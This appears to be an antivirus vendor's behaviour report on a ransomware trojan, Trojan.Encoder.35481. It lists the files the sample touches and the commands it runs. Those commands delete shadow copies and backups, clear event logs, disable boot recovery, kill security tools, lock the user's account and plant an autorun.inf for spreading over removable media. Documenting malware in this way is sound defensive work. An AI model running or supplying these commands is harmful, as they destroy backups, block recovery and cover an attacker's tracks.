Trojan.Encoder.35481

Technical Information

To ensure autorun and distribution

Creates the following files on removable media

<Drive name for removable media>:\windowsscan.exe

Malicious functions

To complicate detection of its presence in the operating system,

deletes volume shadow copies.

Executes the following

'%WINDIR%\syswow64\taskkill.exe' /im chrome.exe /f
'%WINDIR%\syswow64\taskkill.exe' /im ComboCleaner.exe /f

Modifies file system

Creates the following files

C:\autorun.inf
%WINDIR%scan.exe
D:\windowsscan.exe

Modifies the following files

%APPDATA%\adobe\acrobat\dc\tmdocs.sav
%APPDATA%\icqm\icq\graphics\phone\agent_online.bmp
%APPDATA%\icqm\icq\graphics\phone\agent_offline_inv.bmp
%APPDATA%\icqm\icq\graphics\phone\agent_offline.bmp
%APPDATA%\icqm\icq\fonts\segoesc.ttf
%APPDATA%\icqm\icq\dll\altergeo.msi
%APPDATA%\icqm\icq\database\citylist_uz.csv
%APPDATA%\icqm\icq\database\citylist_ua.csv
%APPDATA%\icqm\icq\database\citylist_tr.csv
%APPDATA%\icqm\icq\database\citylist_ru.csv
%APPDATA%\icqm\icq\database\citylist_kz.csv
%APPDATA%\icqm\icq\database\citylist_en.csv
%APPDATA%\icqm\vplog.dat
%APPDATA%\icq-profile\update\languages.hash
%APPDATA%\icq-profile\update\languages.dict
%APPDATA%\icq-profile\update\languages.aff
%APPDATA%\icq-profile\base\opt.dbs
%APPDATA%\icq-profile\base\mra.dbs
%APPDATA%\icq-profile\installerlang.xml
%APPDATA%\ghisler\wincmd.ini
%APPDATA%\adobe\logtransport2\logtransport2.cfg
%APPDATA%\adobe\acrobat\dc\security\crlcache\ce338828149963dcea4cd26bb86f0363b4ca0ba5.crl
%APPDATA%\adobe\acrobat\dc\security\crlcache\0fded5ceb68c302b1cdb2bddd9d0000e76539cb0.crl
%APPDATA%\adobe\acrobat\dc\security\addressbook.acrodata
%APPDATA%\adobe\acrobat\dc\preferences\defaultheuristics.dat
%APPDATA%\adobe\acrobat\dc\jscache\globsettings
%APPDATA%\adobe\acrobat\dc\jscache\globdata
%APPDATA%\adobe\acrobat\dc\tmgrpprm.sav
%APPDATA%\icqm\icq\graphics\phone\agent_online_inv.bmp
%APPDATA%\icqm\icq\graphics\phone\icq_offline.bmp

Modifies multiple files.

Modifies user data files (Trojan.Encoder).

Miscellaneous

Searches for the following windows

ClassName: '' WindowName: ''

Creates and executes the following

'%WINDIR%\syswow64\cmd.exe' /C net users %username% LockedByNominatusCrypto7 && taskkill /im ComboCleaner.exe /f && msg * Loading.. Please Wait' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C cmd.exe /c wevtutil cl application' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C cmd.exe /c wmic shadowcopy delete' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C cmd.exe /c wevtutil cl security' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C cmd.exe /c wevtutil cl system' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C cmd.exe /c wbadmin delete catalog quiet' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C cmd.exe /c wmic SHADOWCOPY /nointeractive' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP deleteOldest' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C cmd.exe /c bcdedit /set {default} recoveryenabled No' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C taskkill /im chrome.exe /f && taskkill /im WireShark.exe /f && taskkill /im MSASCUI.exe /f && taskkill /im taskmgr.exe /f && taskkill /im regedit.exe /f && taskkill /im Kaspersky.exe /f && t...' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C netsh Interface Set Interface Wi-Fi 12 disable' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C echo open^=WindowsScan^.exe >> ..\autorun.inf' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C echo ^[autorun^] > ..\autorun.inf' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C cmd.exe /c vssadmin delete shadows /all /quiet' (with hidden window)
'%WINDIR%\syswow64\cmd.exe' /C cd %windir% && cd.. && for /f %f in ('*.bak /s') do del %f /f /q' (with hidden window)

Executes the following

'%WINDIR%\syswow64\cmd.exe' /C net users %username% LockedByNominatusCrypto7 && taskkill /im ComboCleaner.exe /f && msg * Loading.. Please Wait
'%WINDIR%\syswow64\cmd.exe' /c vssadmin delete shadows /all /quiet
'%WINDIR%\syswow64\cmd.exe' /c wmic SHADOWCOPY /nointeractive
'%WINDIR%\syswow64\cmd.exe' /c wevtutil cl system
'%WINDIR%\syswow64\cmd.exe' /c wmic shadowcopy delete
'%WINDIR%\syswow64\cmd.exe' /c wevtutil cl application
'%WINDIR%\syswow64\cmd.exe' /c wbadmin delete catalog quiet
'%WINDIR%\syswow64\cmd.exe' /c *.bak /s
'%WINDIR%\syswow64\cmd.exe' /c wbadmin DELETE SYSTEMSTATEBACKUP
'%WINDIR%\syswow64\net.exe' users user LockedByNominatusCrypto7
'%WINDIR%\syswow64\netsh.exe' Interface Set Interface Wi-Fi 12 disable
'%WINDIR%\syswow64\wevtutil.exe' cl system
'%WINDIR%\syswow64\wevtutil.exe' cl security
'%WINDIR%\syswow64\wevtutil.exe' cl application
'%WINDIR%\syswow64\cmd.exe' /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
'%WINDIR%\syswow64\cmd.exe' /c wevtutil cl security
'%WINDIR%\syswow64\cmd.exe' /c bcdedit /set {default} recoveryenabled No
'%WINDIR%\syswow64\cmd.exe' /c wbadmin DELETE SYSTEMSTATEBACKUP deleteOldest
'%WINDIR%\syswow64\cmd.exe' /C cd %windir% && cd.. && for /f %f in ('*.bak /s') do del %f /f /q
'%WINDIR%\syswow64\cmd.exe' /C echo open^=WindowsScan^.exe >> ..\autorun.inf
'%WINDIR%\syswow64\cmd.exe' /C netsh Interface Set Interface Wi-Fi 12 disable
'%WINDIR%\syswow64\cmd.exe' /C taskkill /im chrome.exe /f && taskkill /im WireShark.exe /f && taskkill /im MSASCUI.exe /f && taskkill /im taskmgr.exe /f && taskkill /im regedit.exe /f && taskkill /im Kaspersky.exe /f && t...
'%WINDIR%\syswow64\cmd.exe' /C cmd.exe /c bcdedit /set {default} recoveryenabled No
'%WINDIR%\syswow64\cmd.exe' /C cmd.exe /c bcdedit /set {default} bootstatuspolicy ignoreallfailures
'%WINDIR%\syswow64\cmd.exe' /C cmd.exe /c vssadmin delete shadows /all /quiet
'%WINDIR%\syswow64\cmd.exe' /C echo ^[autorun^] > ..\autorun.inf
'%WINDIR%\syswow64\cmd.exe' /C cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP deleteOldest
'%WINDIR%\syswow64\cmd.exe' /C cmd.exe /c wbadmin delete catalog quiet
'%WINDIR%\syswow64\cmd.exe' /C cmd.exe /c wevtutil cl system
'%WINDIR%\syswow64\cmd.exe' /C cmd.exe /c wevtutil cl security
'%WINDIR%\syswow64\cmd.exe' /C cmd.exe /c wmic shadowcopy delete
'%WINDIR%\syswow64\cmd.exe' /C cmd.exe /c wevtutil cl application
'%WINDIR%\syswow64\cmd.exe' /C cmd.exe /c wmic SHADOWCOPY /nointeractive
'%WINDIR%\syswow64\cmd.exe' /C cmd.exe /c wbadmin DELETE SYSTEMSTATEBACKUP
'%WINDIR%\syswow64\net1.exe' users user LockedByNominatusCrypto7
'%WINDIR%\syswow64\wbem\wmic.exe' SHADOWCOPY /nointeractive

TECHNOLOGIES

TERMINOLOGIE

COURS ET EDU

MYTHES

Technical Information

Recommandations pour le traitement

Free trial